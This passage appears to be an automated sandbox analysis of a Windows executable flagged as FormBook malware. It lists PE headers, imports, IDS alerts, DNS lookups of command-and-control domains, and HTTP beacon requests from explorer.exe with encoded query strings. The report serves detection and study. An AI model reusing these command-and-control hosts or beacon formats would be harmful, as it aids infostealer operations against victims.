push dword ptr [esp+14h]
push eax
call 00007F1588A77302h
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007F1588A74FC5h
cmp cl, 00000020h
jne 00007F1588A74F68h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F1588A74F5Ch
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x9e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5a5a | 0x5c00 | False | 0.660453464674 | data | 6.41769823686 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.4453125 | data | 5.18162709925 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1af98 | 0x400 | False | 0.55859375 | data | 4.70902740305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x24000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2c000 | 0x9e0 | 0xa00 | False | 0.45625 | data | 4.51012867721 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2c190 | 0x2e8 | data | English | United States
RT_DIALOG | 0x2c478 | 0x100 | data | English | United States
RT_DIALOG | 0x2c578 | 0x11c | data | English | United States
RT_DIALOG | 0x2c698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x2c6f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x2c710 | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

Imports

DLL | Import
KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
06/10/21-14:36:46.806513 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49741 | 80 | 192.168.2.3 | 34.102.136.180
06/10/21-14:36:46.806513 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49741 | 80 | 192.168.2.3 | 34.102.136.180
06/10/21-14:36:46.806513 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49741 | 80 | 192.168.2.3 | 34.102.136.180
06/10/21-14:36:46.947381 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49741 | 34.102.136.180 | 192.168.2.3
06/10/21-14:36:52.333303 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49743 | 80 | 192.168.2.3 | 157.245.232.77
06/10/21-14:36:52.333303 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49743 | 80 | 192.168.2.3 | 157.245.232.77
06/10/21-14:36:52.333303 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49743 | 80 | 192.168.2.3 | 157.245.232.77
06/10/21-14:36:57.655557 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49744 | 80 | 192.168.2.3 | 23.227.38.74
06/10/21-14:36:57.655557 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49744 | 80 | 192.168.2.3 | 23.227.38.74
06/10/21-14:36:57.655557 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49744 | 80 | 192.168.2.3 | 23.227.38.74
06/10/21-14:36:57.730741 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49744 | 23.227.38.74 | 192.168.2.3
06/10/21-14:37:18.660568 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49747 | 80 | 192.168.2.3 | 62.149.128.40
06/10/21-14:37:18.660568 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49747 | 80 | 192.168.2.3 | 62.149.128.40
06/10/21-14:37:18.660568 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49747 | 80 | 192.168.2.3 | 62.149.128.40
06/10/21-14:37:34.273370 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49750 | 34.102.136.180 | 192.168.2.3

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 10, 2021 14:36:41.414776087 CEST | 49735 | 80 | 192.168.2.3 | 165.22.38.5
Jun 10, 2021 14:36:41.542696953 CEST | 80 | 49735 | 165.22.38.5 | 192.168.2.3
Jun 10, 2021 14:36:41.542872906 CEST | 49735 | 80 | 192.168.2.3 | 165.22.38.5
Jun 10, 2021 14:36:41.543024063 CEST | 49735 | 80 | 192.168.2.3 | 165.22.38.5
Jun 10, 2021 14:36:41.670629025 CEST | 80 | 49735 | 165.22.38.5 | 192.168.2.3
Jun 10, 2021 14:36:41.674711943 CEST | 80 | 49735 | 165.22.38.5 | 192.168.2.3
Jun 10, 2021 14:36:41.674747944 CEST | 80 | 49735 | 165.22.38.5 | 192.168.2.3
Jun 10, 2021 14:36:41.674931049 CEST | 49735 | 80 | 192.168.2.3 | 165.22.38.5
Jun 10, 2021 14:36:41.675261974 CEST | 49735 | 80 | 192.168.2.3 | 165.22.38.5
Jun 10, 2021 14:36:41.802669048 CEST | 80 | 49735 | 165.22.38.5 | 192.168.2.3
Jun 10, 2021 14:36:46.763731956 CEST | 49741 | 80 | 192.168.2.3 | 34.102.136.180
Jun 10, 2021 14:36:46.806230068 CEST | 80 | 49741 | 34.102.136.180 | 192.168.2.3
Jun 10, 2021 14:36:46.806391954 CEST | 49741 | 80 | 192.168.2.3 | 34.102.136.180
Jun 10, 2021 14:36:46.806513071 CEST | 49741 | 80 | 192.168.2.3 | 34.102.136.180
Jun 10, 2021 14:36:46.848884106 CEST | 80 | 49741 | 34.102.136.180 | 192.168.2.3
Jun 10, 2021 14:36:46.947381020 CEST | 80 | 49741 | 34.102.136.180 | 192.168.2.3
Jun 10, 2021 14:36:46.947462082 CEST | 80 | 49741 | 34.102.136.180 | 192.168.2.3
Jun 10, 2021 14:36:46.947693110 CEST | 49741 | 80 | 192.168.2.3 | 34.102.136.180
Jun 10, 2021 14:36:46.992661953 CEST | 80 | 49741 | 34.102.136.180 | 192.168.2.3
Jun 10, 2021 14:36:52.134191990 CEST | 49743 | 80 | 192.168.2.3 | 157.245.232.77
Jun 10, 2021 14:36:52.332736015 CEST | 80 | 49743 | 157.245.232.77 | 192.168.2.3
Jun 10, 2021 14:36:52.333158970 CEST | 49743 | 80 | 192.168.2.3 | 157.245.232.77
Jun 10, 2021 14:36:52.333302975 CEST | 49743 | 80 | 192.168.2.3 | 157.245.232.77
Jun 10, 2021 14:36:52.531209946 CEST | 80 | 49743 | 157.245.232.77 | 192.168.2.3
Jun 10, 2021 14:36:52.531318903 CEST | 80 | 49743 | 157.245.232.77 | 192.168.2.3
Jun 10, 2021 14:36:52.531372070 CEST | 80 | 49743 | 157.245.232.77 | 192.168.2.3
Jun 10, 2021 14:36:52.531611919 CEST | 49743 | 80 | 192.168.2.3 | 157.245.232.77
Jun 10, 2021 14:36:52.531677008 CEST | 49743 | 80 | 192.168.2.3 | 157.245.232.77
Jun 10, 2021 14:36:52.729552984 CEST | 80 | 49743 | 157.245.232.77 | 192.168.2.3
Jun 10, 2021 14:36:57.611773014 CEST | 49744 | 80 | 192.168.2.3 | 23.227.38.74
Jun 10, 2021 14:36:57.655070066 CEST | 80 | 49744 | 23.227.38.74 | 192.168.2.3
Jun 10, 2021 14:36:57.655231953 CEST | 49744 | 80 | 192.168.2.3 | 23.227.38.74
Jun 10, 2021 14:36:57.655556917 CEST | 49744 | 80 | 192.168.2.3 | 23.227.38.74
Jun 10, 2021 14:36:57.697685003 CEST | 80 | 49744 | 23.227.38.74 | 192.168.2.3
Jun 10, 2021 14:36:57.730741024 CEST | 80 | 49744 | 23.227.38.74 | 192.168.2.3
Jun 10, 2021 14:36:57.730763912 CEST | 80 | 49744 | 23.227.38.74 | 192.168.2.3
Jun 10, 2021 14:36:57.730776072 CEST | 80 | 49744 | 23.227.38.74 | 192.168.2.3
Jun 10, 2021 14:36:57.730788946 CEST | 80 | 49744 | 23.227.38.74 | 192.168.2.3
Jun 10, 2021 14:36:57.730799913 CEST | 80 | 49744 | 23.227.38.74 | 192.168.2.3
Jun 10, 2021 14:36:57.730808020 CEST | 80 | 49744 | 23.227.38.74 | 192.168.2.3
Jun 10, 2021 14:36:57.730911016 CEST | 80 | 49744 | 23.227.38.74 | 192.168.2.3
Jun 10, 2021 14:36:57.730973005 CEST | 49744 | 80 | 192.168.2.3 | 23.227.38.74
Jun 10, 2021 14:36:57.731034040 CEST | 49744 | 80 | 192.168.2.3 | 23.227.38.74
Jun 10, 2021 14:36:57.731090069 CEST | 49744 | 80 | 192.168.2.3 | 23.227.38.74
Jun 10, 2021 14:37:18.590595007 CEST | 49747 | 80 | 192.168.2.3 | 62.149.128.40
Jun 10, 2021 14:37:18.660319090 CEST | 80 | 49747 | 62.149.128.40 | 192.168.2.3
Jun 10, 2021 14:37:18.660419941 CEST | 49747 | 80 | 192.168.2.3 | 62.149.128.40
Jun 10, 2021 14:37:18.660567999 CEST | 49747 | 80 | 192.168.2.3 | 62.149.128.40
Jun 10, 2021 14:37:18.730734110 CEST | 80 | 49747 | 62.149.128.40 | 192.168.2.3
                                                                                                              Jun 10, 2021 14:37:18.730801105 CEST804974762.149.128.40192.168.2.3
                                                                                                              Jun 10, 2021 14:37:18.730845928 CEST804974762.149.128.40192.168.2.3
                                                                                                              Jun 10, 2021 14:37:18.730884075 CEST804974762.149.128.40192.168.2.3
                                                                                                              Jun 10, 2021 14:37:18.730901003 CEST4974780192.168.2.362.149.128.40
                                                                                                              Jun 10, 2021 14:37:18.731070042 CEST4974780192.168.2.362.149.128.40
                                                                                                              Jun 10, 2021 14:37:18.731112957 CEST4974780192.168.2.362.149.128.40
                                                                                                              Jun 10, 2021 14:37:18.800710917 CEST804974762.149.128.40192.168.2.3
                                                                                                              Jun 10, 2021 14:37:28.911634922 CEST4974980192.168.2.3160.153.136.3
                                                                                                              Jun 10, 2021 14:37:28.963741064 CEST8049749160.153.136.3192.168.2.3
                                                                                                              Jun 10, 2021 14:37:28.963879108 CEST4974980192.168.2.3160.153.136.3
                                                                                                              Jun 10, 2021 14:37:28.964153051 CEST4974980192.168.2.3160.153.136.3
                                                                                                              Jun 10, 2021 14:37:29.016647100 CEST8049749160.153.136.3192.168.2.3
                                                                                                              Jun 10, 2021 14:37:29.018930912 CEST8049749160.153.136.3192.168.2.3
                                                                                                              Jun 10, 2021 14:37:29.018975019 CEST8049749160.153.136.3192.168.2.3
                                                                                                              Jun 10, 2021 14:37:29.019244909 CEST4974980192.168.2.3160.153.136.3
                                                                                                              Jun 10, 2021 14:37:29.019284010 CEST4974980192.168.2.3160.153.136.3
                                                                                                              Jun 10, 2021 14:37:29.071325064 CEST8049749160.153.136.3192.168.2.3
                                                                                                              Jun 10, 2021 14:37:34.093084097 CEST4975080192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:37:34.135099888 CEST804975034.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:37:34.135303020 CEST4975080192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:37:34.135488033 CEST4975080192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:37:34.177417040 CEST804975034.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:37:34.273370028 CEST804975034.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:37:34.273396015 CEST804975034.102.136.180192.168.2.3
                                                                                                              Jun 10, 2021 14:37:34.273545980 CEST4975080192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:37:34.273617983 CEST4975080192.168.2.334.102.136.180
                                                                                                              Jun 10, 2021 14:37:34.315685034 CEST804975034.102.136.180192.168.2.3

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 10, 2021 14:36:36.123982906 CEST | 192.168.2.3 | 8.8.8.8 | 0x81c1 | Standard query (0) | www.allyexpense.com | A (IP address) | IN (0x0001)
Jun 10, 2021 14:36:41.350483894 CEST | 192.168.2.3 | 8.8.8.8 | 0x183d | Standard query (0) | www.protectpursuit.com | A (IP address) | IN (0x0001)
Jun 10, 2021 14:36:46.694658995 CEST | 192.168.2.3 | 8.8.8.8 | 0xbcde | Standard query (0) | www.freshdeliciousberryfarm.com | A (IP address) | IN (0x0001)
Jun 10, 2021 14:36:51.983397007 CEST | 192.168.2.3 | 8.8.8.8 | 0x6984 | Standard query (0) | www.sw-advisers.com | A (IP address) | IN (0x0001)
Jun 10, 2021 14:36:57.543658018 CEST | 192.168.2.3 | 8.8.8.8 | 0xb6b6 | Standard query (0) | www.goldgrandpa.com | A (IP address) | IN (0x0001)
Jun 10, 2021 14:37:02.747368097 CEST | 192.168.2.3 | 8.8.8.8 | 0xac4a | Standard query (0) | www.2dmaxximumrecords.com | A (IP address) | IN (0x0001)
Jun 10, 2021 14:37:13.404011965 CEST | 192.168.2.3 | 8.8.8.8 | 0x389a | Standard query (0) | www.oilleakgames.com | A (IP address) | IN (0x0001)
Jun 10, 2021 14:37:18.494946957 CEST | 192.168.2.3 | 8.8.8.8 | 0x5b1d | Standard query (0) | www.goldinsacks.com | A (IP address) | IN (0x0001)
Jun 10, 2021 14:37:23.745273113 CEST | 192.168.2.3 | 8.8.8.8 | 0xbbba | Standard query (0) | www.goodlukc.com | A (IP address) | IN (0x0001)
Jun 10, 2021 14:37:28.858174086 CEST | 192.168.2.3 | 8.8.8.8 | 0x3010 | Standard query (0) | www.growwithjenn.com | A (IP address) | IN (0x0001)
Jun 10, 2021 14:37:34.027822971 CEST | 192.168.2.3 | 8.8.8.8 | 0xfb9d | Standard query (0) | www.bring-wellness.com | A (IP address) | IN (0x0001)
Jun 10, 2021 14:37:39.291151047 CEST | 192.168.2.3 | 8.8.8.8 | 0x5366 | Standard query (0) | www.topazsnacks.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 10, 2021 14:36:36.328604937 CEST | 8.8.8.8 | 192.168.2.3 | 0x81c1 | Server failure (2) | www.allyexpense.com | none | none | A (IP address) | IN (0x0001)
Jun 10, 2021 14:36:41.411506891 CEST | 8.8.8.8 | 192.168.2.3 | 0x183d | No error (0) | www.protectpursuit.com | protectpursuit.com |  | CNAME (Canonical name) | IN (0x0001)
Jun 10, 2021 14:36:41.411506891 CEST | 8.8.8.8 | 192.168.2.3 | 0x183d | No error (0) | protectpursuit.com |  | 165.22.38.5 | A (IP address) | IN (0x0001)
Jun 10, 2021 14:36:46.762590885 CEST | 8.8.8.8 | 192.168.2.3 | 0xbcde | No error (0) | www.freshdeliciousberryfarm.com | freshdeliciousberryfarm.com |  | CNAME (Canonical name) | IN (0x0001)
Jun 10, 2021 14:36:46.762590885 CEST | 8.8.8.8 | 192.168.2.3 | 0xbcde | No error (0) | freshdeliciousberryfarm.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Jun 10, 2021 14:36:52.132129908 CEST | 8.8.8.8 | 192.168.2.3 | 0x6984 | No error (0) | www.sw-advisers.com | sw-advisers.com |  | CNAME (Canonical name) | IN (0x0001)
Jun 10, 2021 14:36:52.132129908 CEST | 8.8.8.8 | 192.168.2.3 | 0x6984 | No error (0) | sw-advisers.com |  | 157.245.232.77 | A (IP address) | IN (0x0001)
Jun 10, 2021 14:36:57.609603882 CEST | 8.8.8.8 | 192.168.2.3 | 0xb6b6 | No error (0) | www.goldgrandpa.com | yummymeatballs.myshopify.com |  | CNAME (Canonical name) | IN (0x0001)
Jun 10, 2021 14:36:57.609603882 CEST | 8.8.8.8 | 192.168.2.3 | 0xb6b6 | No error (0) | yummymeatballs.myshopify.com | shops.myshopify.com |  | CNAME (Canonical name) | IN (0x0001)
Jun 10, 2021 14:36:57.609603882 CEST | 8.8.8.8 | 192.168.2.3 | 0xb6b6 | No error (0) | shops.myshopify.com |  | 23.227.38.74 | A (IP address) | IN (0x0001)
Jun 10, 2021 14:37:02.922837019 CEST | 8.8.8.8 | 192.168.2.3 | 0xac4a | Server failure (2) | www.2dmaxximumrecords.com | none | none | A (IP address) | IN (0x0001)
Jun 10, 2021 14:37:13.486615896 CEST | 8.8.8.8 | 192.168.2.3 | 0x389a | Name error (3) | www.oilleakgames.com | none | none | A (IP address) | IN (0x0001)
Jun 10, 2021 14:37:18.588766098 CEST | 8.8.8.8 | 192.168.2.3 | 0x5b1d | No error (0) | www.goldinsacks.com |  | 62.149.128.40 | A (IP address) | IN (0x0001)
Jun 10, 2021 14:37:23.804264069 CEST | 8.8.8.8 | 192.168.2.3 | 0xbbba | Name error (3) | www.goodlukc.com | none | none | A (IP address) | IN (0x0001)
Jun 10, 2021 14:37:28.909409046 CEST | 8.8.8.8 | 192.168.2.3 | 0x3010 | No error (0) | www.growwithjenn.com | growwithjenn.com |  | CNAME (Canonical name) | IN (0x0001)
Jun 10, 2021 14:37:28.909409046 CEST | 8.8.8.8 | 192.168.2.3 | 0x3010 | No error (0) | growwithjenn.com |  | 160.153.136.3 | A (IP address) | IN (0x0001)
Jun 10, 2021 14:37:34.091212988 CEST | 8.8.8.8 | 192.168.2.3 | 0xfb9d | No error (0) | www.bring-wellness.com | bring-wellness.com |  | CNAME (Canonical name) | IN (0x0001)
Jun 10, 2021 14:37:34.091212988 CEST | 8.8.8.8 | 192.168.2.3 | 0xfb9d | No error (0) | bring-wellness.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Jun 10, 2021 14:37:39.386704922 CEST | 8.8.8.8 | 192.168.2.3 | 0x5366 | No error (0) | www.topazsnacks.com | topazsnacks.com |  | CNAME (Canonical name) | IN (0x0001)
Jun 10, 2021 14:37:39.386704922 CEST | 8.8.8.8 | 192.168.2.3 | 0x5366 | No error (0) | topazsnacks.com |  | 135.181.180.74 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.protectpursuit.com
• www.freshdeliciousberryfarm.com
• www.sw-advisers.com
• www.goldgrandpa.com
• www.goldinsacks.com
• www.growwithjenn.com
• www.bring-wellness.com

                                                                                                              HTTP Packets

Session ID: 0, Source IP: 192.168.2.3, Source Port: 49735, Destination IP: 165.22.38.58, Destination Port: 80, Process: C:\Windows\explorer.exe
Timestamp: Jun 10, 2021 14:36:41.543024063 CEST, kBytes transferred: 1430, Direction: OUT
Data: GET /dp3a/?rTWxa=fFin23A3InOxv8Q1OZSqiWR/FjS3KuFpXPcC+roY+PuFOGx4uYNLJpybUr51Ny74Rks0&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1
Host: www.protectpursuit.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Jun 10, 2021 14:36:41.674711943 CEST, kBytes transferred: 1430, Direction: IN
Data: HTTP/1.1 404 Not Found
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 10 Jun 2021 12:36:41 GMT
                                                                                                              Content-Length: 0
                                                                                                              Connection: close
                                                                                                              Vary: Origin


Session ID: 1, Source IP: 192.168.2.3, Source Port: 49741, Destination IP: 34.102.136.180, Destination Port: 80, Process: C:\Windows\explorer.exe
Timestamp: Jun 10, 2021 14:36:46.806513071 CEST, kBytes transferred: 3358, Direction: OUT
Data: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=DH0B3lUhAa5VBPw8nCCOXpLU24maY23yGmrt22qj0kvQjGAaKYYXdT0Mh/TRCK5k4cmX HTTP/1.1
Host: www.freshdeliciousberryfarm.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Jun 10, 2021 14:36:46.947381020 CEST, kBytes transferred: 3359, Direction: IN
Data: HTTP/1.1 403 Forbidden
                                                                                                              Server: openresty
                                                                                                              Date: Thu, 10 Jun 2021 12:36:46 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 275
                                                                                                              ETag: "60ba413e-113"
                                                                                                              Via: 1.1 google
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID: 2, Source IP: 192.168.2.3, Source Port: 49743, Destination IP: 157.245.232.77, Destination Port: 80, Process: C:\Windows\explorer.exe
Timestamp: Jun 10, 2021 14:36:52.333302975 CEST, kBytes transferred: 3392, Direction: OUT
Data: GET /dp3a/?rTWxa=76AMkVxxuSKB5pgh4RNc3EipO3rbFW8MEUNJys/eLa/AxdTMjRac1XeBowoP/wZORJRk&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1
Host: www.sw-advisers.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Jun 10, 2021 14:36:52.531318903 CEST, kBytes transferred: 3393, Direction: IN
Data: HTTP/1.1 301 Moved Permanently
                                                                                                              Server: nginx
                                                                                                              Date: Thu, 10 Jun 2021 12:36:52 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 162
                                                                                                              Connection: close
                                                                                                              Location: https://www.sw-advisers.com/dp3a/?rTWxa=76AMkVxxuSKB5pgh4RNc3EipO3rbFW8MEUNJys/eLa/AxdTMjRac1XeBowoP/wZORJRk&qXtd=VpFTeL6xRNZ0stZ0
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID: 3, Source IP: 192.168.2.3, Source Port: 49744, Destination IP: 23.227.38.74, Destination Port: 80, Process: C:\Windows\explorer.exe
Timestamp: Jun 10, 2021 14:36:57.655556917 CEST, kBytes transferred: 3394, Direction: OUT
Data: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=GkWHDDYMiWr4Ju0U4teKyAR8hKcpKlGmV2ZHyKwA/bXhSAEvQCtqjiLuXtjyxk2BGjrR HTTP/1.1
Host: www.goldgrandpa.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Jun 10, 2021 14:36:57.730741024 CEST, kBytes transferred: 3395, Direction: IN
Data: HTTP/1.1 403 Forbidden
                                                                                                              Date: Thu, 10 Jun 2021 12:36:57 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Sorting-Hat-PodId: 170
                                                                                                              X-Sorting-Hat-ShopId: 39696531622
                                                                                                              X-Dc: gcp-europe-west1
                                                                                                              X-Request-ID: b1326e52-2a8e-4175-b0a0-a109297b2ed1
                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              X-Download-Options: noopen
                                                                                                              X-Content-Type-Options: nosniff
